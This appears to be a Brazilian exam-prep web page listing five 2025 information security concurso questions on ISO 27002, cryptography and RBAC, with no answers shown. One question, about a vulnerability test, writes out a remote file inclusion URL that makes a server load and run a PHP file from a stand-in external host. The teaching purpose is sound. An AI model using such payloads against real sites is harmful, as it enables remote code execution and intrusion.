Home
Cadastre-se
Concurso Público
- Concurso Público
- Concursos Abertos
- Questões de Concurso
- Material Gratuito
- Provas para Download
OAB
- OAB
- Questões OAB
ENEM
- ENEM
- Questões ENEM
Dicas
Fale Conosco

Questões de Segurança da Informação do ano 2025

Pesquise questões de concurso nos filtros abaixo

Modo de Exibição

Matéria

Assunto

Banca

Ano

Tipo

Nível de Escolaridade

Listagem de Questões de Segurança da Informação do ano 2025

#Questão 1131073 - Segurança da Informação, ISO 27002, FUNDATEC, 2025, Prefeitura de Tangará da Serra - MT, Analista de Sistemas

Segundo a Norma ISO/IEC 27002:2013, são controles relacionados à gestão de ativos, EXCETO:

Procedimentos para o tratamento dos ativos devem ser desenvolvidos e implementados de acordo com o esquema de classificação da informação adotado pela organização.

A informação deve ser classificada em termos dos requisitos legais, valor, criticidade e sensibilidade para divulgação ou modificação não autorizada.

O acesso à informação e às funções de sistemas aplicativos deve ser restrito de acordo com a política de controle de acesso.

Mídias devem ser descartadas de forma segura, usando procedimentos formais quando não forem mais necessárias.

#Questão 1131322 - Segurança da Informação, Análise de Vulnerabilidade e Gestão de Riscos, FGV, 2025, TCE/RR, Analista Administrativo - Tecnologia da Informação, com especialidade em Desenvolvimento de Sistemas

A página web da sociedade empresária Exemplo1234, disponível na internet, permite que internautas acessem o edital de uma vaga de trabalho por meio do endereço eletrônico http://empresa1234.com/vaga.php?file=vaga.pdf.
Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada.
Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php
O teste foi realizado utilizando o seguinte endereço:
http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php
Ao acessar essa URL, o conteúdo do arquivo badpage.php foi carregado e executado diretamente pelo servidor da Empresa1234, comprometendo sua segurança.
O tipo de vulnerabilidade presente no servidor de página da Empresa1234 é o

LFI – Local File Inclusion.

XSS – Cross-Site Scripting.

SQL Injection.

RFI – Remote File Inclusion.

FPD – Full Path Disclosure.

#Questão 1131323 - Segurança da Informação, Criptografia, FGV, 2025, TCE/RR, Analista Administrativo - Tecnologia da Informação, com especialidade em Desenvolvimento de Sistemas

Durante uma auditoria no setor de TI de TCE-RR, foi constatado que os analistas estavam utilizando criptografia por chave pública para o envio de informações confidenciais. Para garantir que os dados sejam protegidos contra acessos não autorizados, cada servidor precisa configurar corretamente as chaves de criptografia antes de iniciar a troca de mensagens.
Com base no funcionamento da criptografia assimétrica, sobre o processo de envio de uma mensagem criptografada é correto afirmar que

o remetente deve gerar um par de chaves, enviar sua chave privada ao destinatário e encriptar os dados usando sua própria chave pública.

o remetente deve encriptar a mensagem utilizando a chave pública do destinatário e manter sua chave privada protegida para garantir a segurança na decriptação.

o destinatário deve compartilhar sua chave privada com o remetente para que este possa utilizá-la no processo de encriptação e garantir a confidencialidade da mensagem.

o remetente e o destinatário devem compartilhar uma chave pública comum e utilizá-la tanto para encriptar quanto para descriptografar as mensagens.

o remetente deve encriptar a mensagem utilizando a chave privada do destinatário e manter sua chave pública protegida para garantir a segurança na decriptação.

#Questão 1131350 - Segurança da Informação, Criptografia, FGV, 2025, TCE/RR, Analista Administrativo - Tecnologia da Informação, com especialidade em Banco de Dados

A criptografia dos dados em diferentes estados vem sendo utilizada tanto para garantir a segurança quanto para prevenir possíveis vazamentos de informações sensíveis.
No contexto de segurança de banco de dados, avalie as afirmativas a seguir.

I. O protocolo HTTPS, bem como outros similares, tem se tornado default para APIs na nuvem modernas.
II. Criptografia de disco completo em laptops são essenciais para proteger dados em caso de roubo do dispositivo.
III. Todas as formas de dados armazenados, incluindo dados em servidores, sistemas de arquivos, bancos de dados e armazenamento em nuvem, devem ser criptografadas para proteger contra acessos não autorizados.

Acerca do estado dos dados nas três afirmativas, é correto afirmar que

I e II correspondem à criptografia de dados em repouso e III, a criptografia de dados em trânsito.

I, II e III fazem referência à criptografia de dados em trânsito.

I fala sobre criptografia de dados em trânsito, II e III falam sobre criptografia de dados em repouso.

I e III correspondem à criptografia de dados em repouso e II, à criptografia de dados em trânsito.

I e II correspondem à criptografia de dados em trânsito e III, à criptografia de dados em repouso.

#Questão 1131355 - Segurança da Informação, Controles de segurança, FGV, 2025, TCE/RR, Analista Administrativo - Tecnologia da Informação, com especialidade em Banco de Dados

O Controle de Acesso Baseado em Funções (RBAC) é um modelo amplamente utilizado para gerenciar permissões de acesso em ambientes organizacionais.
Assinale a afirmativa correta acerca do funcionamento do RBAC.

O RBAC atribui permissões diretamente a cada usuário, eliminando a necessidade de papéis intermediários.

No RBAC, os usuários herdam permissões com base nas regras de sensibilidade dos dados e nas políticas imutáveis do sistema.

O RBAC organiza as permissões em papéis específicos, e os usuários obtêm acesso aos recursos ao serem associados a esses papéis.

No RBAC, o acesso é determinado por políticas baseadas em atributos individuais dos usuários, como localização ou departamento.

O RBAC é um modelo onde cada usuário pode personalizar suas permissões de acesso com base em suas necessidades operacionais.

Navegue em mais matérias e assuntos

Legislação dos Tribunais de Justiça (TJs)

É uma simples e poderosa ferramenta para te ajudar a passar nos melhores Concursos Públicos. Temos milhares de questões de provas anteriores para praticar totalmente grátis e muito conteúdo para concurso.

Questões de Concurso

Questões de Português
Questões de Raciocínio Lógico
Questões de Atualidades
Questões de Direito Constitucional
Questões de Direito Penal
Questões de Direito Administrativo

Provas por Banca

CESPE
Fundação Carlos Chagas - FCC
Fundação Getúlio Vargas - FGV
Cesgranrio
VUNESP
UPENET/IAUPE

Institucional

Fale Conosco
Política de Privacidade
Termos de Uso

Feito por DEZ PONTOS SERVICOS DIGITAIS